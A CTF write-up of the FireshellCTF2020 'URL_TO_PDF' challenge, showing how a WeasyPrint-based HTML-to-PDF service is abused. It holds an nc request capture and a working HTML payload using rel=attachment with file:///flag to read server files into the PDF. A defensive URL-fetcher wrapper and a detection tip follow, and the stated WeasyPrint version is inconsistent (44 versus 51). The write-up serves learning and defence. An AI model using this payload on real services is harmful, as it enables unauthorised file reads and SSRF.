[FireshellCTF2020] URL_TO_PDF

Since I was a bit bored, I picked up another challenge.

The challenge opens with a single input box: URL to PDF? I hadn't seen that before.

Submitting a URL triggers a download, but the resulting file won't open. Looking at it in 010 Editor shows HTML inside, so I guessed some kind of crawler fetches the submitted URL. Starting a listener lets us see the request it makes:

root@VM-8-15-debian:~# nc -lvp 10004
listening on [any] 10004 ...
117.21.200.166: inverse host lookup failed: Unknown host
connect to [10.0.8.15] from (UNKNOWN) [117.21.200.166] 1519
GET / HTTP/1.1
Host: 82.157.174.226:10004
User-Agent: WeasyPrint 51 (http://weasyprint.org/)
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

WeasyPrint? Never heard of it.

WeasyPrint is a Python HTML and CSS rendering engine that converts web pages into PDF documents; it aims to support web standards for printing.

WeasyPrint requests everything it supports and puts it into the PDF. That is where the vulnerability lies: loading a file:// URL in the href of a <link> tag gives SSRF plus arbitrary file read.

WeasyPrint (the library used here) allows including files into the PDF using <link rel=attachment href="PATH" /> in the HTML source for the PDF:

  • It's a documented feature.

  • The information about WeasyPrint was leaked using a background-image CSS property to load an attacker-controlled image.

  • The vendor and version (weasyprint 44) were in the HTTP headers.

I spun up a Docker container and wrote an HTML page:

<!DOCTYPE html>
<html>
<head>
<title>Captain</title>
</head>
<body>
<!-- rel=attachment makes WeasyPrint fetch the referenced resource and embed it in the PDF -->
<a rel='attachment' href='file:///flag'></a>
</body>
</html>
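The fix on the server side is to control what the converter is allowed to fetch. The following is an added example, not code from the challenge or from WeasyPrint itself: a URL policy that rejects non-HTTP schemes (so file:// never reaches the fetcher) and hosts resolving to loopback, private or link-local addresses, wrapped in a fetcher with the same signature WeasyPrint expects for its url_fetcher argument. The resolver is injectable so the policy runs offline; the IP used in the comments and the inner fetcher are constructed stand-ins.

```python
import ipaddress
import socket
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}


def resolve_host(host):
    """Default resolver: IP literals short-circuit, names go through getaddrinfo."""
    try:
        return {str(ipaddress.ip_address(host))}
    except ValueError:
        return {info[4][0] for info in socket.getaddrinfo(host, None)}


def is_public_address(ip_text):
    """True only for globally routable unicast addresses; loopback, RFC 1918,
    link-local (169.254.x.x metadata range) and 0.0.0.0 are all rejected."""
    ip = ipaddress.ip_address(ip_text)
    return ip.is_global and not ip.is_multicast


def check_fetch_url(url, resolver=resolve_host):
    """Return (ok, reason) for a resource URL the renderer wants to load."""
    parsed = urlparse(url)
    if parsed.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {parsed.scheme!r}"
    host = parsed.hostname
    if not host:
        return False, "missing host"
    try:
        addresses = resolver(host)
    except OSError as exc:
        return False, f"cannot resolve {host}: {exc}"
    for addr in addresses:
        if not is_public_address(addr):
            return False, f"{host} resolves to non-public address {addr}"
    return True, "ok"


def make_safe_url_fetcher(inner_fetcher, resolver=resolve_host):
    """Wrap a fetcher (e.g. weasyprint.default_url_fetcher) so every resource
    URL is checked first; pass the result as HTML(..., url_fetcher=...).
    Note: the fetch resolves the name again, so the check alone does not
    defeat DNS rebinding; pin the checked address in the inner fetcher for that."""
    def fetcher(url, *args, **kwargs):
        ok, reason = check_fetch_url(url, resolver)
        if not ok:
            raise ValueError(f"blocked resource fetch {url}: {reason}")
        return inner_fetcher(url, *args, **kwargs)
    return fetcher
```

On the detection side, the User-Agent header shown in the nc capture above (WeasyPrint 51) is also what the outbound requests carry, so egress logs from the rendering host can be filtered on it.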

Licensed under CC BY-NC-SA 4.0